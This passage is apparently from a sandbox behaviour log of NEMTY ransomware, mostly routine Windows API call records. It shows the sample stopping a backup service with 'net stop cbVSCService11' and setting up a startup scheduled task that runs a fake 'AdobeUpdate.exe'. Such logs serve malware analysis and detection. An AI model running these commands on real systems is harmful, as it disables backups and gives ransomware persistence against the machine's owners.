Size=0x3c) returned 0x451eb8 [0069.518] GetProcessHeap () returned 0x440000 [0069.518] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456a40 | out: hHeap=0x440000) returned 1 [0069.518] GetConsoleOutputCP () returned 0x1b5 [0069.519] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.519] GetUserDefaultLCID () returned 0x409 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3cfb04, cchData=128 | out: lpLCData="0") returned 2 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3cfb04, cchData=128 | out: lpLCData="0") returned 2 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3cfb04, cchData=128 | out: lpLCData="1") returned 2 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.521] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.521] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.521] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.522] GetProcessHeap () returned 0x440000 [0069.522] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20c) returned 0x452dc8 [0069.522] GetConsoleTitleW (in: lpConsoleTitle=0x452dc8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.522] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.522] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.522] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.523] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.523] GetProcessHeap () returned 0x440000 [0069.523] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x456a40 [0069.523] GetProcessHeap () returned 0x440000 [0069.523] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456a40 | out: hHeap=0x440000) returned 1 [0069.523] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.523] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.523] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.523] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.523] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.523] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.523] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.523] GetProcessHeap () returned 0x440000 [0069.523] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x58) returned 0x452fe0 [0069.523] GetProcessHeap () returned 0x440000 [0069.524] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x10) returned 0x44ff10 [0069.524] GetProcessHeap () returned 0x440000 [0069.524] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x32) returned 0x453040 [0069.525] GetConsoleTitleW (in: lpConsoleTitle=0x3cf7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.526] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.526] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.526] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.526] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.526] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.526] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.526] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.526] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.526] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.526] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.526] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.526] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.526] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.526] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.526] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.526] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.526] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.526] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.526] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.526] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.526] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.526] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.526] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.526] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.526] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.526] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.526] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.526] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.526] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.527] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.527] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.527] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.527] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.527] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.527] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.527] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.527] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.527] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.527] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.527] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.527] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.527] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.527] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.527] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.527] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.527] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.527] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.527] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.527] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.527] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.527] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.527] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.527] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.527] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.527] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.527] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.527] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.527] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.527] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.527] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.527] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.527] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.527] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.527] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.527] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.528] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.528] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.528] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.528] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.528] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.528] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.528] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.528] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.528] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.528] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.528] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.528] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.528] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.528] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.528] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.528] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.528] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.528] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.528] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.528] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.528] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.528] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.528] GetProcessHeap () returned 0x440000 [0069.528] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x453080 [0069.528] GetProcessHeap () returned 0x440000 [0069.528] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3a) returned 0x453298 [0069.528] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.529] GetProcessHeap () returned 0x440000 [0069.529] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x418) returned 0x4407f0 [0069.529] SetErrorMode (uMode=0x0) returned 0x0 [0069.529] SetErrorMode (uMode=0x1) returned 0x0 [0069.529] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4407f8, lpFilePart=0x3cf31c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3cf31c*="Desktop") returned 0x25 [0069.529] SetErrorMode (uMode=0x0) returned 0x1 [0069.529] GetProcessHeap () returned 0x440000 [0069.529] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4407f0, Size=0x5c) returned 0x4407f0 [0069.529] GetProcessHeap () returned 0x440000 [0069.529] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4407f0) returned 0x5c [0069.529] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.529] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.529] GetProcessHeap () returned 0x440000 [0069.529] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x120) returned 0x4532e0 [0069.529] GetProcessHeap () returned 0x440000 [0069.529] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x238) returned 0x440858 [0069.535] GetProcessHeap () returned 0x440000 [0069.535] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x440858, Size=0x122) returned 0x440858 [0069.535] GetProcessHeap () returned 0x440000 [0069.535] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440858) returned 0x122 [0069.535] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.535] GetProcessHeap () returned 0x440000 [0069.535] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe0) returned 0x453408 [0069.536] GetProcessHeap () returned 0x440000 [0069.536] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x453408, Size=0x76) returned 0x453408 [0069.536] GetProcessHeap () returned 0x440000 [0069.536] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x453408) returned 0x76 [0069.537] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.537] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3cf098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3cf098) returned 0xffffffff [0069.537] GetLastError () returned 0x2 [0069.537] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3cf098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3cf098) returned 0xffffffff [0069.537] GetLastError () returned 0x2 [0069.537] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.537] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3cf098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3cf098) returned 0x453488 [0069.538] GetProcessHeap () returned 0x440000 [0069.538] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x14) returned 0x4534c8 [0069.538] FindClose (in: hFindFile=0x453488 | out: hFindFile=0x453488) returned 1 [0069.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3cf098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3cf098) returned 0xffffffff [0069.538] GetLastError () returned 0x2 [0069.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3cf098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3cf098) returned 0x453488 [0069.538] GetProcessHeap () returned 0x440000 [0069.538] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4534c8, Size=0x4) returned 0x4534c8 [0069.538] FindClose (in: hFindFile=0x453488 | out: hFindFile=0x453488) returned 1 [0069.538] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.538] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.538] GetConsoleTitleW (in: lpConsoleTitle=0x3cf590, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.538] InitializeProcThreadAttributeList (in: lpAttributeList=0x3cf418, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3cf4e0 | out: lpAttributeList=0x3cf418, lpSize=0x3cf4e0) returned 1 [0069.538] UpdateProcThreadAttribute (in: lpAttributeList=0x3cf418, dwFlags=0x0, Attribute=0x60001, lpValue=0x3cf4d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3cf418, lpPreviousValue=0x0) returned 1 [0069.538] GetStartupInfoW (in: lpStartupInfo=0x3cf3d4 | out: lpStartupInfo=0x3cf3d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.538] GetProcessHeap () returned 0x440000 [0069.538] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x18) returned 0x453488 [0069.538] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.539] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.540] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.540] GetProcessHeap () returned 0x440000 [0069.540] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x453488 | out: hHeap=0x440000) returned 1 [0069.540] GetProcessHeap () returned 0x440000 [0069.540] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa) returned 0x44ff28 [0069.540] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.542] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop cbVSCService11", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3cf474*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop cbVSCService11", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3cf4c0 | out: lpCommandLine="net stop cbVSCService11", lpProcessInformation=0x3cf4c0*(hProcess=0x78, hThread=0x74, dwProcessId=0x8ec, dwThreadId=0x7a4)) returned 1 [0070.039] CloseHandle (hObject=0x74) returned 1 [0070.039] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.039] GetProcessHeap () returned 0x440000 [0070.039] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x455f00 | out: hHeap=0x440000) returned 1 [0070.039] GetEnvironmentStringsW () returned 0x455f00* [0070.039] GetProcessHeap () returned 0x440000 [0070.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb36) returned 0x4540c0 [0070.039] FreeEnvironmentStringsW (penv=0x455f00) returned 1 [0070.039] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.344] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3cf3b4 | out: lpExitCode=0x3cf3b4*=0x2) returned 1 [0072.344] CloseHandle (hObject=0x78) returned 1 [0072.344] _vsnwprintf (in: _Buffer=0x3cf4fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x3cf3c0 | out: _Buffer="00000002") returned 8 [0072.344] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.344] GetProcessHeap () returned 0x440000 [0072.344] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4540c0 | out: hHeap=0x440000) returned 1 [0072.344] GetEnvironmentStringsW () returned 0x4540c0* [0072.344] GetProcessHeap () returned 0x440000 [0072.345] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb5c) returned 0x4595a8 [0072.345] FreeEnvironmentStringsW (penv=0x4540c0) returned 1 [0072.345] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.345] GetProcessHeap () returned 0x440000 [0072.345] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4595a8 | out: hHeap=0x440000) returned 1 [0072.345] GetEnvironmentStringsW () returned 0x4540c0* [0072.345] GetProcessHeap () returned 0x440000 [0072.345] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb5c) returned 0x4595a8 [0072.345] FreeEnvironmentStringsW (penv=0x4540c0) returned 1 [0072.345] GetProcessHeap () returned 0x440000 [0072.345] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44ff28 | out: hHeap=0x440000) returned 1 [0072.345] DeleteProcThreadAttributeList (in: lpAttributeList=0x3cf418 | out: lpAttributeList=0x3cf418) [0072.345] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.345] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.345] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.345] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.345] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.345] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.346] SetConsoleInputExeNameW () returned 0x1 [0072.346] GetConsoleOutputCP () returned 0x1b5 [0072.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.346] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.346] exit (_Code=2) Process: id = "40" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x3917000" os_pid = "0x7a8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "35" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0007becf" [0xc000000f] Thread: id = 152 os_tid = 0x978 Thread: id = 153 os_tid = 0x9a8 Thread: id = 154 os_tid = 0x9d0 Thread: id = 155 os_tid = 0x9f4 Thread: id = 156 os_tid = 0x9f0 Thread: id = 157 os_tid = 0x940 Thread: id = 158 os_tid = 0x7a0 Thread: id = 161 os_tid = 0x964 Thread: id = 162 os_tid = 0xb0 Thread: id = 163 os_tid = 0x9dc Thread: id = 290 os_tid = 0x638 Thread: id = 300 os_tid = 0xba4 Process: id = "41" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x792c2000" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c schtasks.exe /create /sc onstart /tn \"_NEMTY_5Y4CYS9_\" /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 160 os_tid = 0x95c [0068.587] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3efb28 | out: lpSystemTimeAsFileTime=0x3efb28*(dwLowDateTime=0x97b8a630, dwHighDateTime=0x1d57b18)) [0068.587] GetCurrentProcessId () returned 0xa14 [0068.587] GetCurrentThreadId () returned 0x95c [0068.587] GetTickCount () returned 0x114b1d2 [0068.587] QueryPerformanceCounter (in: lpPerformanceCount=0x3efb20 | out: lpPerformanceCount=0x3efb20*=18880842261) returned 1 [0068.588] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0068.588] __set_app_type (_Type=0x1) [0068.588] __p__fmode () returned 0x74eb31f4 [0068.588] __p__commode () returned 0x74eb31fc [0068.588] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0068.588] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0068.588] GetCurrentThreadId () returned 0x95c [0068.588] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x95c) returned 0x60 [0068.588] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0068.589] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0068.589] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.589] HeapSetInformation 